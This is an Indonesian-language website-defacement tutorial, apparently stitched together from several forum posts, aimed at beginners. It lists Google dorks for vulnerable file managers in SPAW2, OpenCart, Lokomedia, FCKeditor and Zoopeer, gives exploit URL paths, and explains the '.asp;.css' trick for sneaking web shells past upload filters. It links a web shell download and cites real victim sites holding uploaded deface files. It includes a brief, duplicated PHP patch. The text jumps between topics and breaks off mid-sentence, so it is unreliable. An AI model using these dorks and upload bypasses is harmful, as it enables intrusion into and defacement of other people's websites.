setelah nge klik itu, tnggu loading selesai baru kamu harus klik
"(File A file on your site)
dang anti alamat protocol website nya jadi :
"javascript:__doPostBack('ctlURL$cmdUpload','' )" => [ tanpa tanda kutip 2 ]
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl,
*.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini http://www.media*fire..com/?zqvx2ajbyc4b17j
tapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt
sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali
[contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"
DORK
inurl:spaw2/dialogs/ atau
inurl:spaw2/uploads/files/
POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2
&lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9
jika sudah menemukan targetnya contoh seperti ini :
http://olgabz.com/spaw2/dialogs/
trus kamu lihat file kamu sudah masuk blom seperti gambar di bawah ini:
ni hasilnya http://olgabz.com/spaw2/uploads/files/pajenk.html
maaf ini khusu bwat newbi yg ingin blajar,,klo udah master mohon bimbingannya ..
seperti biasa nyarinya lewat paman google
dork nya :
SUPORT BY OPENCART
atau
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting
suport opencart)
klo pengen smuanya,site nya ilangin jadi gini aja Powered By OpenCart
langsung ke caranya,,
jika kamu sudah mendapatkan target nya
untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat
hasilnya... :P
jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
maka hasilnya seperti ini..
http://www.digitalbazzar.co.uk/
contoh lihat
DORK=
inurl:"admin/foto_berita/"
inurl:"media.php?module="
allinurl:/media.php?module=berita
path :
/admin/content.php?module=user
PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file
/admin/content.php
dengan menambahkan penggalan kode berikut :
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}
menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan
penggalan kode berikut:
Hasilnya ..
http://smpn4pakem.sch.id//userfiles/pajenk.txt
dorknya
Code:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Exploit :
Code:
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.ht
ml
http://smpn4pakem.sch.id/editor/filemanager/connectors/uploadtest.ht
ml
lalu pilih connector nya dari ASP --> PHP,,tinggal masukin filenya agan deh...tapi berbentuk
.TXT yah,,,
jika sudah terupload,maka cara untuk menampilkan shell punya kita dengan mengklik "view
original size"..
maka hasilnya seperti ini http://www.hoac-bsa.org/Images/pajenk.asp;.jpg
cukup simple bukan .. ???
langsung coba dah gan gk perlu pake bengong ..
7.powered by zoopeer
seperti biasa kita mendeface dengan menggunakan dork biar lebih mudah ..
hampir sama kya opencart lah ..
Quote:
dork nya powered by zoopeer
Quote: exploit
fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/
connector.php
caranya : Buka google lalu tuliskan powered by zoopeer, jika sudah ada target
contoh :
http://seifico.com/
http://seifico.com/fck/editor/filemanager/browser/default/browser.html?Type=File&Connect
or=connectors/php/connector.php
fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php
/connector.php
menjadi